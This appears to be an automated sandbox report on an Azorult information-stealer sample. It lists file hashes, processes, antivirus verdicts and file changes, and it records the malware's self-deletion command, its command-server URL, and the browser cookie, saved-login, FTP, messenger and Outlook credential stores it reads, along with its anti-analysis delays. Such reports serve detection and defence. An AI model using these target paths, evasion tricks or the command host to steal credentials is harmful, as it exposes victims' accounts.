paladin316

azorult_81cbcc404e61f34b1e403ab322281c04e7c4bed3964223f7851a147321a60949_2019-08-20_23_50.txt

Aug 20th, 2019
  1.  
  2. * MalFamily: "Azorult"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "81cbcc404e61f34b1e403ab322281c04e7c4bed3964223f7851a147321a60949"
  7. * File Size: 263680
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "81cbcc404e61f34b1e403ab322281c04e7c4bed3964223f7851a147321a60949"
  10. * MD5: "4fe6ded31faa87734843abc02e4a9777"
  11. * SHA1: "688a240ee32a8e249fa9dec8f9d378654112c93c"
  12. * SHA512: "250c3578ec041b2184ad588517b4d3917dda723a295fba667f8dac80a62febaf351a6284006769bc5b844ba39066b87c4cd37d1b1cb6a99c40a34fa078549055"
  13. * CRC32: "3DA15A81"
  14. * SSDEEP: "3072:07cMo2pzNq2Qs06gjDq+NwZXhPvgPQX/QF0f+NIWxXFNzogczuKDrcuiaas+ylzt:b2k9njDqNOPQ1fhwL5cqbjpyZ+zszFX"
  15.  
  16. * Process Execution:
  17. "81cbcc404e61f34b1e403ab322281c04e7c4bed3964223f7851a147321a60949.exe",
  18. "cmd.exe",
  19. "timeout.exe",
  20. "services.exe",
  21. "WmiApSrv.exe",
  22. "svchost.exe",
  23. "WmiPrvSE.exe",
  24. "WmiPrvSE.exe",
  25. "svchost.exe",
  26. "taskhost.exe",
  27. "WmiPrvSE.exe"
  28.  
  29.  
  30. * Executed Commands:
  31. "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"81cbcc404e61f34b1e403ab322281c04e7c4bed3964223f7851a147321a60949.exe\"",
  32. "C:\\Windows\\system32\\lsass.exe",
  33. "C:\\Windows\\system32\\wbem\\WmiApSrv.exe",
  34. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  35. "C:\\Windows\\system32\\timeout.exe 3",
  36. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding",
  37. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
  38.  
  39.  
  40. * Signatures Detected:
  41.  
  42. "Description": "Creates RWX memory",
  43. "Details":
  44.  
  45.  
  46. "Description": "A process attempted to delay the analysis task.",
  47. "Details":
  48.  
  49. "Process": "svchost.exe tried to sleep 660 seconds, actually delayed analysis time by 0 seconds"
  50.  
  51.  
  52. "Process": "WmiPrvSE.exe tried to sleep 660 seconds, actually delayed analysis time by 0 seconds"
  53.  
  54.  
  55.  
  56.  
  57. "Description": "A process created a hidden window",
  58. "Details":
  59.  
  60. "Process": "81cbcc404e61f34b1e403ab322281c04e7c4bed3964223f7851a147321a60949.exe -> C:\\Windows\\System32\\cmd.exe"
  61.  
  62.  
  63.  
  64.  
  65. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  66. "Details":
  67.  
  68. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  69.  
  70.  
  71. "suspicious_request": "http://normpost.club/index.php"
  72.  
  73.  
  74. "suspicious_request": "http://ip-api.com/json"
  75.  
  76.  
  77.  
  78.  
  79. "Description": "Performs some HTTP requests",
  80. "Details":
  81.  
  82. "url": "http://normpost.club/index.php"
  83.  
  84.  
  85. "url": "http://ip-api.com/json"
  86.  
  87.  
  88.  
  89.  
  90. "Description": "Deletes its original binary from disk",
  91. "Details":
  92.  
  93.  
  94. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  95. "Details":
  96.  
  97. "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 16089573 times"
  98.  
  99.  
  100. "Spam": "81cbcc404e61f34b1e403ab322281c04e7c4bed3964223f7851a147321a60949.exe (1612) called API NtQueryFullAttributesFile 24271 times"
  101.  
  102.  
  103.  
  104.  
  105. "Description": "Steals private information from local Internet browsers",
  106. "Details":
  107.  
  108. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@doubleclick1.txt"
  109.  
  110.  
  111. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@advertising1.txt"
  112.  
  113.  
  114. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.bing2.txt"
  115.  
  116.  
  117. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@media2.txt"
  118.  
  119.  
  120. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.google1.txt"
  121.  
  122.  
  123. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google5.txt"
  124.  
  125.  
  126. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google4.txt"
  127.  
  128.  
  129. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google3.txt"
  130.  
  131.  
  132. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google1.txt"
  133.  
  134.  
  135. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.msn2.txt"
  136.  
  137.  
  138. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  139.  
  140.  
  141. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@msn1.txt"
  142.  
  143.  
  144. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.msn2.txt"
  145.  
  146.  
  147. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  148.  
  149.  
  150. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@3lift1.txt"
  151.  
  152.  
  153. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@bing2.txt"
  154.  
  155.  
  156. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@scorecardresearch2.txt"
  157.  
  158.  
  159. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  160.  
  161.  
  162. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@atwola2.txt"
  163.  
  164.  
  165.  
  166.  
  167. "Description": "Collects information about installed applications",
  168. "Details":
  169.  
  170. "Program": "Google Update Helper"
  171.  
  172.  
  173.  
  174.  
  175. "Program": "Microsoft Excel MUI 2013"
  176.  
  177.  
  178. "Program": "Microsoft Outlook MUI 2013"
  179.  
  180.  
  181.  
  182.  
  183. "Program": "Google Chrome"
  184.  
  185.  
  186. "Program": "Adobe Flash Player 29 NPAPI"
  187.  
  188.  
  189. "Program": "Adobe Flash Player 29 ActiveX"
  190.  
  191.  
  192. "Program": "Microsoft DCF MUI 2013"
  193.  
  194.  
  195. "Program": "Microsoft Access MUI 2013"
  196.  
  197.  
  198. "Program": "Microsoft Office Proofing Tools 2013 - English"
  199.  
  200.  
  201. "Program": "Adobe Acrobat Reader DC"
  202.  
  203.  
  204. "Program": "Microsoft Publisher MUI 2013"
  205.  
  206.  
  207. "Program": "Microsoft Office Shared MUI 2013"
  208.  
  209.  
  210. "Program": "Microsoft Office OSM MUI 2013"
  211.  
  212.  
  213. "Program": "Microsoft InfoPath MUI 2013"
  214.  
  215.  
  216. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  217.  
  218.  
  219. "Program": "Outils de v\\xc3\\xa9rification linguistique 2013 de Microsoft Office\\xc2\\xa0- Fran\\xc3\\xa7ais"
  220.  
  221.  
  222. "Program": "Microsoft Word MUI 2013"
  223.  
  224.  
  225. "Program": "Microsoft OneDrive"
  226.  
  227.  
  228. "Program": "Microsoft Groove MUI 2013"
  229.  
  230.  
  231. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xc3\\xb1ol"
  232.  
  233.  
  234.  
  235.  
  236. "Program": "Microsoft Access Setup Metadata MUI 2013"
  237.  
  238.  
  239. "Program": "Microsoft Office OSM UX MUI 2013"
  240.  
  241.  
  242. "Program": "Java Auto Updater"
  243.  
  244.  
  245. "Program": "Microsoft PowerPoint MUI 2013"
  246.  
  247.  
  248. "Program": "Microsoft Office Professional Plus 2013"
  249.  
  250.  
  251. "Program": "Adobe Refresh Manager"
  252.  
  253.  
  254. "Program": "Microsoft Office Proofing 2013"
  255.  
  256.  
  257. "Program": "Microsoft Lync MUI 2013"
  258.  
  259.  
  260.  
  261.  
  262. "Program": "Microsoft OneNote MUI 2013"
  263.  
  264.  
  265.  
  266.  
  267. "Description": "File has been identified by 55 Antiviruses on VirusTotal as malicious",
  268. "Details":
  269.  
  270. "MicroWorld-eScan": "Trojan.GenericKD.32231080"
  271.  
  272.  
  273. "FireEye": "Generic.mg.4fe6ded31faa8773"
  274.  
  275.  
  276. "CAT-QuickHeal": "Trojanpws.Azorult"
  277.  
  278.  
  279. "ALYac": "Spyware.Infostealer.Azorult"
  280.  
  281.  
  282. "Cylance": "Unsafe"
  283.  
  284.  
  285. "CrowdStrike": "win/malicious_confidence_90% (W)"
  286.  
  287.  
  288. "Alibaba": "TrojanPSW:Win32/Azorult.91e5cc0b"
  289.  
  290.  
  291. "K7GW": "Trojan ( 005551291 )"
  292.  
  293.  
  294. "K7AntiVirus": "Trojan ( 005551291 )"
  295.  
  296.  
  297. "Arcabit": "Trojan.Generic.D1EBCEA8"
  298.  
  299.  
  300. "TrendMicro": "TROJ_FRS.VSNW09H19"
  301.  
  302.  
  303. "Symantec": "Trojan.Gen.MBT"
  304.  
  305.  
  306. "APEX": "Malicious"
  307.  
  308.  
  309. "Avast": "Win32:Trojan-gen"
  310.  
  311.  
  312. "Kaspersky": "Trojan-PSW.Win32.Azorult.zcl"
  313.  
  314.  
  315. "BitDefender": "Trojan.GenericKD.32231080"
  316.  
  317.  
  318. "NANO-Antivirus": "Trojan.Win32.Stealer.fvacre"
  319.  
  320.  
  321. "Paloalto": "generic.ml"
  322.  
  323.  
  324. "ViRobot": "Trojan.Win32.Z.Azorult.263680"
  325.  
  326.  
  327. "Ad-Aware": "Trojan.GenericKD.32231080"
  328.  
  329.  
  330. "Emsisoft": "Trojan.Crypt (A)"
  331.  
  332.  
  333. "Comodo": "Malware@#3oqlddld8it08"
  334.  
  335.  
  336. "F-Secure": "Trojan.TR/Crypt.Agent.aybfj"
  337.  
  338.  
  339. "DrWeb": "Trojan.PWS.Stealer.24943"
  340.  
  341.  
  342. "Zillya": "Trojan.Azorult.Win32.13"
  343.  
  344.  
  345. "Invincea": "heuristic"
  346.  
  347.  
  348. "McAfee-GW-Edition": "RDN/Generic.grp"
  349.  
  350.  
  351. "Trapmine": "malicious.high.ml.score"
  352.  
  353.  
  354. "Sophos": "Mal/GandCrab-H"
  355.  
  356.  
  357. "SentinelOne": "DFI - Malicious PE"
  358.  
  359.  
  360. "Jiangmin": "Trojan.Sodinokibi.a"
  361.  
  362.  
  363. "Avira": "TR/Crypt.Agent.aybfj"
  364.  
  365.  
  366. "MAX": "malware (ai score=100)"
  367.  
  368.  
  369. "Antiy-AVL": "TrojanPSW/Win32.AZORult"
  370.  
  371.  
  372. "Microsoft": "Trojan:Win32/Predator.BS!MTB"
  373.  
  374.  
  375. "Endgame": "malicious (high confidence)"
  376.  
  377.  
  378. "AegisLab": "Trojan.Win32.Azorult.i!c"
  379.  
  380.  
  381. "ZoneAlarm": "Trojan-PSW.Win32.Azorult.zcl"
  382.  
  383.  
  384. "GData": "Trojan.GenericKD.32231080"
  385.  
  386.  
  387. "AhnLab-V3": "Trojan/Win32.MalPe.R285289"
  388.  
  389.  
  390. "Acronis": "suspicious"
  391.  
  392.  
  393. "McAfee": "RDN/Generic.grp"
  394.  
  395.  
  396. "TACHYON": "Trojan-PWS/W32.Azorult.263680"
  397.  
  398.  
  399. "VBA32": "BScope.Trojan.Downloader"
  400.  
  401.  
  402. "Malwarebytes": "Trojan.MalPack.GS.Generic"
  403.  
  404.  
  405. "ESET-NOD32": "a variant of Win32/Kryptik.GVHC"
  406.  
  407.  
  408. "TrendMicro-HouseCall": "Trojan.Win32.SODINOK.SM.hp"
  409.  
  410.  
  411. "Rising": "Trojan.Generic@ML.94 (RDMK:4f2kJIUgKUxgaCN/39geFA)"
  412.  
  413.  
  414. "MaxSecure": "Trojan.Malware.300983.susgen"
  415.  
  416.  
  417. "Fortinet": "W32/Kryptik.GVOI!tr"
  418.  
  419.  
  420. "Webroot": "W32.Trojan.Gen"
  421.  
  422.  
  423. "AVG": "Win32:Trojan-gen"
  424.  
  425.  
  426. "Cybereason": "malicious.ee32a8"
  427.  
  428.  
  429. "Panda": "Trj/GdSda.A"
  430.  
  431.  
  432. "Qihoo-360": "Win32/Trojan.PSW.f70"
  433.  
  434.  
  435.  
  436.  
  437. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  438. "Details":
  439.  
  440.  
  441. "Description": "Harvests credentials from local FTP client softwares",
  442. "Details":
  443.  
  444. "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
  445.  
  446.  
  447.  
  448.  
  449. "Description": "Harvests information related to installed instant messenger clients",
  450. "Details":
  451.  
  452. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  453.  
  454.  
  455.  
  456.  
  457. "Description": "Harvests information related to installed mail clients",
  458. "Details":
  459.  
  460. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  461.  
  462.  
  463. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  464.  
  465.  
  466. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  467.  
  468.  
  469. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  470.  
  471.  
  472. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  473.  
  474.  
  475. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  476.  
  477.  
  478. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  479.  
  480.  
  481. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  482.  
  483.  
  484. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  485.  
  486.  
  487. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  488.  
  489.  
  490. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  491.  
  492.  
  493. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  494.  
  495.  
  496. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  497.  
  498.  
  499. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  500.  
  501.  
  502. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  503.  
  504.  
  505. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  506.  
  507.  
  508. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  509.  
  510.  
  511. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  512.  
  513.  
  514. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  515.  
  516.  
  517. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  518.  
  519.  
  520. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  521.  
  522.  
  523.  
  524.  
  525. "Description": "Collects information to fingerprint the system",
  526. "Details":
  527.  
  528.  
  529.  
  530. * Started Service:
  531. "VaultSvc",
  532. "wmiApSrv"
  533.  
  534.  
  535. * Mutexes:
  536. "A81FB8C60-BBE6E186-FC9B5DB5-36DA4559-33946726",
  537. "Global\\RefreshRA_Mutex_Lib",
  538. "Global\\RefreshRA_Mutex",
  539. "Global\\RefreshRA_Mutex_Flag",
  540. "Global\\WmiApSrv"
  541.  
  542.  
  543. * Modified Files:
  544. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
  545. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
  546. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
  547. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
  548. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
  549. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
  550. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
  551. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
  552. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
  553. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
  554. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
  555. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
  556. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
  557. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
  558. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
  559. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
  560. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
  561. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
  562. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  563. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
  564. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
  565. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
  566. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
  567. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
  568. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
  569. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
  570. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
  571. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
  572. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
  573. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
  574. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
  575. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
  576. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
  577. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
  578. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
  579. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
  580. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
  581. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
  582. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
  583. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
  584. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
  585. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
  586. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
  587. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
  588. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
  589. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
  590. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
  591. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
  592. "C:\\Users\\user\\AppData\\Local\\Temp\\335162341510543816632285.tmp",
  593. "C:\\Users\\user\\AppData\\Local\\Temp\\33567468582923687909264.tmp",
  594. "C:\\Users\\user\\AppData\\Local\\Temp\\335675314371805155542307.tmp",
  595. "C:\\Users\\user\\AppData\\Local\\Temp\\33567609264422488998616.tmp",
  596. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  597. "\\??\\WMIDataDevice",
  598. "\\??\\PIPE\\samr",
  599. "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
  600. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
  601. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
  602. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
  603. "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
  604. "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
  605. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
  606. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  607.  
  608.  
  609. * Deleted Files:
  610. "C:\\Users\\user\\AppData\\Local\\Temp\\335162341510543816632285.tmp",
  611. "C:\\Users\\user\\AppData\\Local\\Temp\\33567468582923687909264.tmp",
  612. "C:\\Users\\user\\AppData\\Local\\Temp\\335675314371805155542307.tmp",
  613. "C:\\Users\\user\\AppData\\Local\\Temp\\33567609264422488998616.tmp",
  614. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
  615. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
  616. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
  617. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
  618. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
  619. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
  620. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
  621. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
  622. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
  623. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
  624. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
  625. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
  626. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
  627. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
  628. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
  629. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
  630. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
  631. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
  632. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  633. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
  634. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
  635. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
  636. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
  637. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
  638. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
  639. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
  640. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
  641. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
  642. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
  643. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
  644. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
  645. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
  646. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
  647. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
  648. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
  649. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
  650. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
  651. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
  652. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
